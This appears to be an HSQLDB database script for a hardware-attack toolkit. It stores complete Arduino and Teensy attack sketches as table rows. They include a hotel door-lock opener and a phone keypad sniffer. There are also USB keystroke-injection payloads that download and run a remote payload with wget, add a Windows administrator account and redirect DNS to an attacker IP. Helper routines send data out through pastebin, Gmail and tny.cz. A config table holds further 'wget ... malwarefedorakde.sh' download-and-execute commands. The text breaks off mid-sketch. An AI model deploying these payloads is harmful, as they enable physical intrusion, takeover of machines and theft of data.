SET DATABASE UNIQUE NAME HSQLDB3F764116C8
SET DATABASE GC 0
SET DATABASE DEFAULT RESULT MEMORY ROWS 0
SET DATABASE EVENT LOG LEVEL 0
SET DATABASE SQL NAMES FALSE
SET DATABASE SQL REGULAR NAMES TRUE
SET DATABASE SQL REFERENCES FALSE
SET DATABASE SQL SIZE TRUE
SET DATABASE SQL TYPES FALSE
SET DATABASE SQL TDC DELETE TRUE
SET DATABASE SQL TDC UPDATE TRUE
SET DATABASE SQL TRANSLATE TTI TYPES TRUE
SET DATABASE SQL CONCAT NULLS TRUE
SET DATABASE SQL NULLS FIRST TRUE
SET DATABASE SQL UNIQUE NULLS TRUE
SET DATABASE SQL CONVERT TRUNCATE TRUE
SET DATABASE SQL AVG SCALE 0
SET DATABASE SQL DOUBLE NAN TRUE
SET DATABASE SQL LONGVAR IS LOB FALSE
SET DATABASE TRANSACTION CONTROL LOCKS
SET DATABASE DEFAULT ISOLATION LEVEL READ COMMITTED
SET DATABASE TRANSACTION ROLLBACK ON CONFLICT TRUE
SET DATABASE TEXT TABLE DEFAULTS ''
SET FILES WRITE DELAY 0
SET FILES BACKUP INCREMENT TRUE
SET FILES CACHE SIZE 10000
SET FILES CACHE ROWS 50000
SET FILES SCALE 32
SET FILES LOB SCALE 32
SET FILES DEFRAG 0
SET FILES NIO TRUE
SET FILES NIO SIZE 256
SET FILES LOG TRUE
SET FILES LOG SIZE 50
CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'
ALTER USER SA SET LOCAL TRUE
CREATE SCHEMA PUBLIC AUTHORIZATION DBA
SET SCHEMA PUBLIC
CREATE MEMORY TABLE PUBLIC.PROPERTIES(PROPERTIES_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL,"NAME" VARCHAR(255),REPLACEVALUE VARCHAR(255),"VALUE" VARCHAR(255),PROPERTIES_EXPLOIT_ID_OID BIGINT,PROPERTIES_INTEGER_IDX INTEGER,CONSTRAINT PROPERTIES_PK PRIMARY KEY(PROPERTIES_ID))
ALTER TABLE PUBLIC.PROPERTIES ALTER COLUMN PROPERTIES_ID RESTART WITH 20
CREATE MEMORY TABLE PUBLIC.EXPLOIT(EXPLOIT_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL,AUTOR VARCHAR(255),CODE VARCHAR(50000),"DATE" TIMESTAMP,"NAME" VARCHAR(255),PRODUCT VARCHAR(255),CONSTRAINT EXPLOIT_PK PRIMARY KEY(EXPLOIT_ID))
ALTER TABLE PUBLIC.EXPLOIT ALTER COLUMN EXPLOIT_ID RESTART WITH 10
CREATE MEMORY TABLE PUBLIC.DESCRIPTION(DESCRIPTION_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL,DESCRIPTION VARCHAR(500),LANGUAJE VARCHAR(255),DESCRIPTION_EXPLOIT_ID_OID BIGINT,DESCRIPTION_INTEGER_IDX INTEGER,CONSTRAINT DESCRIPTION_PK PRIMARY KEY(DESCRIPTION_ID),CONSTRAINT DESCRIPTION_FK1 FOREIGN KEY(DESCRIPTION_EXPLOIT_ID_OID) REFERENCES PUBLIC.EXPLOIT(EXPLOIT_ID))
ALTER TABLE PUBLIC.DESCRIPTION ALTER COLUMN DESCRIPTION_ID RESTART WITH 3
CREATE MEMORY TABLE PUBLIC.DOCUMENT(DOCUMENT_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL,DESCRIPTION VARCHAR(255),FILENAME VARCHAR(255),LANG VARCHAR(255),CONSTRAINT DOCUMENT_PK PRIMARY KEY(DOCUMENT_ID))
ALTER TABLE PUBLIC.DOCUMENT ALTER COLUMN DOCUMENT_ID RESTART WITH 0
CREATE MEMORY TABLE PUBLIC.BACKDOOR(BACKDOOR_ID BIGINT GENERATED BY DEFAULT AS IDENTITY(START WITH 0) NOT NULL,DESCRIPTION VARCHAR(255),FILENAME VARCHAR(255),PLAT VARCHAR(255),CONSTRAINT BACKDOOR_PK PRIMARY KEY(BACKDOOR_ID))
ALTER TABLE PUBLIC.BACKDOOR ALTER COLUMN BACKDOOR_ID RESTART WITH 2
ALTER TABLE PUBLIC.PROPERTIES ADD CONSTRAINT PROPERTIES_FK1 FOREIGN KEY(PROPERTIES_EXPLOIT_ID_OID) REFERENCES PUBLIC.EXPLOIT(EXPLOIT_ID)
ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 1
SET DATABASE DEFAULT INITIAL SCHEMA PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.YES_OR_NO TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.TIME_STAMP TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CARDINAL_NUMBER TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.CHARACTER_DATA TO PUBLIC
GRANT USAGE ON DOMAIN INFORMATION_SCHEMA.SQL_IDENTIFIER TO PUBLIC
GRANT DBA TO SA
SET SCHEMA SYSTEM_LOBS
INSERT INTO BLOCKS VALUES(0,2147483647,0)
SET SCHEMA PUBLIC
INSERT INTO PROPERTIES VALUES(1,'file path','<!--file-->','capture.txt',2,2)
INSERT INTO PROPERTIES VALUES(2,'url','<!--url-->','http://',3,3)
INSERT INTO PROPERTIES VALUES(4,'teensynumber','<!--teensynumber-->','2',3,3)
INSERT INTO PROPERTIES VALUES(5,'username','<!--username-->','',3,3)
INSERT INTO PROPERTIES VALUES(6,'pass','<!--pass-->','',3,3)
INSERT INTO PROPERTIES VALUES(7,'teensynumber','<!--teensynumber-->','',5,5)
INSERT INTO PROPERTIES VALUES(8,'ip','<!--ip-->','',5,5)
INSERT INTO PROPERTIES VALUES(9,'teensynumber','<!--teensynumber-->','',6,6)
INSERT INTO PROPERTIES VALUES(10,'ipresolve','<!--ipresolve-->','',6,6)
INSERT INTO PROPERTIES VALUES(11,'domainToResolve','<!--domainToResolve-->','',6,6)
INSERT INTO PROPERTIES VALUES(12,'teensynumber','<!--teensynumber-->','',7,7)
INSERT INTO PROPERTIES VALUES(13,'user','<!--user-->','',7,7)
INSERT INTO PROPERTIES VALUES(14,'password','<!--password-->','',7,7)
INSERT INTO PROPERTIES VALUES(15,'ip address for ethernet shield','<!--ipaddethernet-->','192,168,16,177',8,8)
INSERT INTO PROPERTIES VALUES(16,'ip address to ping','<!--ipaddping-->','173,194,42,49',8,8)
INSERT INTO PROPERTIES VALUES(17,'download FILE','<!-- keyboard download -->','wget http://localhost:8080/files/scripts/malwarefedorakde.sh',9,9)
INSERT INTO PROPERTIES VALUES(18,'COMMAND SET PRIVILEGES FILE','<!-- keyboard privileges -->','chmod +x malwarefedorakde.sh',9,9)
INSERT INTO PROPERTIES VALUES(19,'COMMAND EXECUTE SCRIPT','<!-- keyboard execute script -->','./malwarefedorakde.sh',9,9)
INSERT INTO EXPLOIT VALUES(1,'Cody Brocious','#define CONSERVATIVE\u000d\u000dint ioPin = 3;\u000d#define BUFSIZE 200\u000dunsigned char buf[BUFSIZE];\u000d\u000d#define pullLow() pinMode(ioPin, OUTPUT)\u000d#define pullHigh() pinMode(ioPin, INPUT)\u000d\u000dunsigned char dbits[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0};\u000d\u000dunsigned char bits[][144] = {\u000d  {\u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    1, 0, 1, 0, 0, 0, 1, 0, \u000d    0, 1, \u000d\u000d    1, 0, 0, 0, 1, 0, 0, 0, 1, \u000d    1, 0, 1, 0, 0, 1, 0, 1, 1, \u000d    1, 1, 0, 0, 0, 0, 1, 1, 1, \u000d    0, 0, 0, 1, 1, 1, 0, 1, 1,\u000d\u000d    1, 1, 1, 1, 1, 1, 1, 1, \u000d    0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0, \u000d    0, 0, 0, 0, 0, 0, 0, 0\u000d  }, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, \u000d  {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0}\u000d};\u000d\u000dunsigned char bval;\u000d\u000dvoid wentLow() {\u000d  bval = 1;\u000d}\u000d\u000dvoid setup() {\u000d}\u000d\u000dbool open() {\u000d  pinMode(ioPin, OUTPUT);\u000d  digitalWrite(ioPin, LOW);\u000d  pinMode(ioPin, INPUT);\u000d  digitalWrite(ioPin, LOW);\u000d\u000d  for(int i = 0; i < sizeof(dbits); ++i) {\u000d    if(dbits[i] == 0) {\u000d      pullLow();\u000d      delayMicroseconds(16);\u000d      pullHigh();\u000d      delayMicroseconds(190);\u000d    } else {\u000d      pullLow();\u000d      delayMicroseconds(16);\u000d      pullHigh();\u000d      delayMicroseconds(56);\u000d      pullLow();\u000d      delayMicroseconds(16);\u000d      pullHigh();\u000d      delayMicroseconds(112);\u000d    }\u000d  }\u000d\u000d  pullLow();\u000d  delayMicroseconds(16);\u000d  pullHigh();\u000d\u000d  bval = 0;\u000d  attachInterrupt(1, wentLow, FALLING);\u000d\u000d  unsigned int i = 0;\u000d  while(digitalRead(ioPin) == HIGH && i++ < 32767) {}\u000d  if(i == 32767)\u000d    return false;\u000d\u000d  delayMicroseconds(20);\u000d  for(int i = 0; i < 164; ++i) {\u000d    buf[i] = 0;\u000d    pullLow();\u000d    delayMicroseconds(8);\u000d    pullHigh();\u000d    bval = 0;\u000d    delayMicroseconds(184);\u000d    buf[i] = bval;\u000d  }\u000d\u000d  for(int i = 0; i < 32+3; ++i)\u000d    bits[0][50+i] = buf[22+i];\u000d\u000d  for(int i = 0; i < 8; ++i)\u000d    bits[0][86+i] = bits[0][50+i] ^ bits[0][50+9+i] ^ bits[0][50+18+i] ^ bits[0][50+27+i];\u000d  bits[0][86] ^= 1;\u000d  bits[0][87] ^= 0;\u000d  bits[0][88] ^= 1;\u000d  bits[0][89] ^= 1;\u000d  bits[0][90] ^= 1;\u000d  bits[0][91] ^= 0;\u000d  bits[0][92] ^= 1;\u000d  bits[0][93] ^= 1;\u000d\u000d#ifdef CONSERVATIVE\u000d  delay(100);\u000d#endif\u000d  for(int j = 0; j < 11; ++j) {\u000d    for(int i = 0; i < sizeof(bits[j]); ++i) {\u000d      if(bits[j][i] == 0) {\u000d        pullLow();\u000d        delayMicroseconds(16);\u000d        pullHigh();\u000d        delayMicroseconds(190);\u000d      } else {\u000d        pullLow();\u000d        delayMicroseconds(16);\u000d        pullHigh();\u000d        delayMicroseconds(56);\u000d        pullLow();\u000d        delayMicroseconds(16);\u000d        pullHigh();\u000d        delayMicroseconds(112);\u000d      }\u000d    }\u000d#ifdef CONSERVATIVE\u000d    delayMicroseconds(2700);\u000d#else\u000d    delayMicroseconds(500);\u000d#endif\u000d  }\u000d  return true;\u000d}\u000d\u000dvoid loop() {\u000d    open();\u000d}\u000d','2013-07-08 00:00:00.000000','Arduino Hotel Hacking','UNO')
INSERT INTO EXPLOIT VALUES(2,'Matias Nahuel Heredia && Fulgore1','#include <SD.h> \u000d\u000dFile myFile; \u000dbyte digit; \u000d\u000dvoid setup() \u000d{ \u000d    pinMode(2, INPUT); //D0 \u000d    pinMode(3, INPUT); //D1 \u000d    pinMode(4, INPUT); //D2 \u000d    pinMode(5, INPUT); //D3 \u000d    pinMode(6, INPUT); //DV \u000d    pinMode(10, OUTPUT); //SD Card SS \u000d     \u000d    if (!SD.begin(10)) \u000d    { \u000d        return; \u000d    } \u000d} \u000d\u000dvoid loop() \u000d{ \u000d    while(digitalRead(6) == LOW) \u000d    { \u000d        ; \u000d    } \u000d     \u000d    digit = 0; \u000d     \u000d    if (digitalRead(2) == HIGH) \u000d    { \u000d        digit = digit + 1; \u000d    } \u000d    if (digitalRead(3) == HIGH) \u000d    { \u000d        digit = digit + 2; \u000d    } \u000d    if (digitalRead(4) == HIGH) \u000d    { \u000d        digit = digit + 4; \u000d    } \u000d    if (digitalRead(5) == HIGH) \u000d    { \u000d        digit = digit + 8; \u000d    } \u000d     \u000d    myFile = SD.open("<!--file-->", FILE_WRITE); \u000d     \u000d    if(myFile) \u000d    { \u000d        switch(digit) \u000d        { \u000d            case 10: \u000d                myFile.print("0"); \u000d                break; \u000d                 \u000d            case 11: \u000d                myFile.print("*"); \u000d                break; \u000d                 \u000d            case 12: \u000d                myFile.print("#"); \u000d                break; \u000d                 \u000d            default: \u000d                myFile.print(digit); \u000d        } \u000d         \u000d        myFile.print("-"); \u000d        myFile.close(); \u000d    } \u000d     \u000d    while(digitalRead(6) == HIGH) \u000d    { \u000d        ; \u000d    } \u000d} \u000d','2013-07-08 00:00:00.000000','Arduino Phone Sniffer','UNO')
INSERT INTO EXPLOIT VALUES(3,'Nikhil "SamratAshok" Mittal','void setup()\u000d{\u000d  delay(5000);\u000d  terminal();\u000d  delay(3000);\u000d  Keyboard.println("wget -O /tmp/pay <!--url-->");\u000d  delay(2000);\u000d  Keyboard.println("xxd -r -p /tmp/pay /tmp/payload");\u000d  delay(2000);\u000d  Keyboard.println("chmod +x /tmp/payload");\u000d  Keyboard.println("/tmp/payload &");\u000d  delay(2000);\u000d  Keyboard.println("exit");\u000d  \u000d}\u000d\u000dvoid loop()\u000d{\u000d   \u000d}\u000d\u000dvoid terminal()\u000d{\u000d  Keyboard.set_modifier(MODIFIERKEY_CTRL);\u000d  Keyboard.send_now();\u000d  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\u000d  Keyboard.send_now();\u000d  Keyboard.set_key1(KEY_T);\u000d  Keyboard.send_now();\u000d  \u000d  delay(100);\u000d  Keyboard.set_modifier(0);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now(); \u000d\u000d}\u000d','2013-07-15 00:00:00.000000','Download and Execute (Linux)','TEENSY')
INSERT INTO EXPLOIT VALUES(4,'Nikhil "SamratAshok" Mittal','#define TEENSY<!--teensynumber-->\u000d#ifdef TEENSY2\u000d    #include<usb_private.h>\u000d#endif\u000d\u000d# define U_ADD "net user <!--username--> <!--pass--> /add"\u000d# define G_ADD "net localgroup Administrators <!--username--> /add"\u000d\u000dvoid setup() { \u000d delay(3000);\u000d  wait_for_drivers(2000);\u000d\u000d  minimise_windows();\u000d  delay(500);\u000d  while(!cmd_admin(3,500))\u000d  {\u000d  reset_windows_desktop(2000);\u000d  }\u000d    Keyboard.println(U_ADD);\u000d    delay(2000);\u000d    Keyboard.println(G_ADD);\u000d    delay(1000);\u000d    Keyboard.println("exit");\u000d}\u000d\u000dvoid loop() {\u000d\u000d}\u000d\u000dvoid wait_for_drivers(int sleep)\u000d{\u000dbool CapsLockTrap = is_caps_on();\u000dwhile(CapsLockTrap == is_caps_on())\u000d{\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000d\u000dint ledkeys(void) {return int(keyboard_leds);}\u000d\u000dbool is_caps_on(void) {return ((ledkeys() & 2) == 2) ? true : false;}\u000d\u000dbool cmd_admin(int reps, int millisecs)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(0);\u000dKeyboard.send_now();\u000ddelay(3000);\u000dKeyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\"");\u000ddelay(2000);\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL);\u000dKeyboard.send_now();\u000dKeyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);\u000dKeyboard.send_now();\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(7000);\u000dsend_left_enter();\u000ddelay(4000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dbool cmd(int reps, int millisecs, char *SomeCommand)\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_R);\u000dKeyboard.send_now();\u000d\u000ddelay(500);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000dKeyboard.print(SomeCommand);\u000dKeyboard.set_key1(KEY_ENTER);\u000dKeyboard.send_now();\u000d\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000d\u000ddelay(3000);\u000dcreate_click_capslock_win();\u000dcheck_for_capslock_success_teensy(reps,millisecs);\u000d}\u000d\u000dvoid make_sure_capslock_is_off(void)\u000d{\u000dif (is_caps_on())\u000d{\u000ddelay(500);\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000ddelay(700);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(700);\u000d}\u000d}\u000d\u000dvoid create_click_capslock_win()\u000d{\u000dKeyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{CAPSLOCK}\" > %temp%\\capslock.vbs");\u000ddelay(400);\u000dKeyboard.println("wscript %temp%\\capslock.vbs");\u000ddelay(2000);\u000d}\u000d\u000dbool check_for_capslock_success_teensy(int reps, int millisecs)\u000d{\u000dunsigned int i = 0;\u000ddo\u000d{\u000ddelay(millisecs);\u000dif (is_caps_on())\u000d{\u000dmake_sure_capslock_is_off();\u000ddelay(700);\u000dreturn true;\u000d}\u000di++;\u000d}\u000dwhile (!is_caps_on() && (i<reps));\u000dreturn false;\u000d}\u000d\u000dvoid minimise_windows(void)\u000d{\u000dKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\u000dKeyboard.set_key1(KEY_M);\u000dKeyboard.send_now();\u000ddelay(300);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(300);\u000d}\u000d\u000dvoid reset_windows_desktop(int sleep)\u000d{\u000ddelay(1000);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(sleep);\u000dminimise_windows();\u000ddelay(200);\u000d}\u000d\u000dvoid send_left_enter(){\u000d  delay(1000);\u000d  Keyboard.set_key1(KEY_LEFT);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d\u000d  Keyboard.set_key1(KEY_ENTER);\u000d  Keyboard.send_now();\u000d  delay(100);\u000d  Keyboard.set_key1(0);\u000d  Keyboard.send_now();\u000d  }\u000d\u000dvoid post(String filename)\u000d{\u000d    Keyboard.print("echo function pht($url,$pars) { >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht = New-Object -ComObject Msxml2.XMLHTTP >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.open(\"POST\", $url, $false) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Content-length\", $pars.length); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.setRequestHeader(\"Connection\", \"close\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $ht.send($pars) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $script:sk=$ht.responseText }>> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid pastebin(String filename)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_login.php\" \"api_dev_key=$dev&api_user_name=$user&api_user_password=$pass\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"https://pastebin.com/api/api_post.php\" \"api_user_key=$sk&api_option=paste&api_dev_key=$dev&api_paste_name=$pn&api_paste_code=$pv&api_paste_private=2\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid gmail(String filename, String filepath)\u000d{\u000d    post(filename);\u000d    Keyboard.print("echo $srv = \"smtp.gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg = new-object Net.Mail.MailMessage >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st = new-object Net.Mail.SmtpClient($srv) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.EnableSsl = $True >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $st.Credentials = New-Object System.Net.NetworkCredential(\"$user\", \"$pass\"); >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.From = \"$user@gmail.com\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.To.Add(\"$user@gmail.com\") >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Subject = $pn >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $msg.Body = $pv >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    if (filepath != "no"){\u000d    \u000d        Keyboard.print("echo $att = new-object Net.Mail.Attachment(\"");\u000d        Keyboard.print (filepath);\u000d        Keyboard.print ("\") >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d        Keyboard.print("echo $msg.Attachments.Add($att) >> %temp%\\");\u000d        Keyboard.print(filename);\u000d        Keyboard.println(".ps1");\u000d    }\u000d    Keyboard.print("echo $st.Send($msg) >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d}\u000d\u000dvoid tinypaste(String filename)\u000d{\u000d    post(filename);\u000d    //http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell\u000d    Keyboard.print("echo $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $utf8 = new-object -TypeName System.Text.UTF8Encoding >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($pass))).Replace(\"-\", \"\").ToLower() >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d    Keyboard.print("echo pht \"http://tny.cz/api/create.xml\" \"paste=$pv&title=$pn&is_code=0&is_private=1&authenticate=$user`:$hash\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d\u000d}\u000d','2013-07-18 00:00:00.000000','Keyboard Add an Admin User (Windows)','TEENSY')
INSERT INTO EXPLOIT VALUES(5,'Nikhil "SamratAshok" Mittal','#define TEENSY<!--teensynumber-->\u000d#ifdef TEENSY2\u000d    #include<usb_private.h>\u000d#endif\u000d\u000dvoid setup(){\u000d  delay(3000);\u000d  wait_for_drivers(2000);\u000d\u000d  minimise_windows();\u000d  delay(500);\u000d  while(!cmd_admin(3,500))\u000d  {\u000d  reset_windows_desktop(2000);\u000d  }\u000d  Keyboard.println("netsh interface ip set dns \"Local Area Connection\" static <!--ip-->");\u000d  delay(3000);\u000d\u000d  Keyboard.println("exit");\u000d  \u000d  \u000d  }\u000d\u000dvoid loop() {\u000d\u0009\u000d}\u000d\u000dvoid wait_for_drivers(int sleep)\u000d{\u000dbool CapsLockTrap = is_caps_on();\u000dwhile(CapsLockTrap == is_caps_on())\u000d{\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000dKeyboard.set_key1(KEY_CAPS_LOCK);\u000dKeyboard.send_now();\u000ddelay(200);\u000dKeyboard.set_modifier(0);\u000dKeyboard.set_key1(0);\u000dKeyboard.send_now();\u000ddelay(500);\u000ddelay(sleep);\u000d}\u000d\u000dint ledkeys(void) {return int(keyboard_leds);}\u000d\u000dbool is_caps_on(void) {return ((ledkeys() & 2) == 2) ? true : false;}\u000d\u000dbool cmd_admin(int reps, int 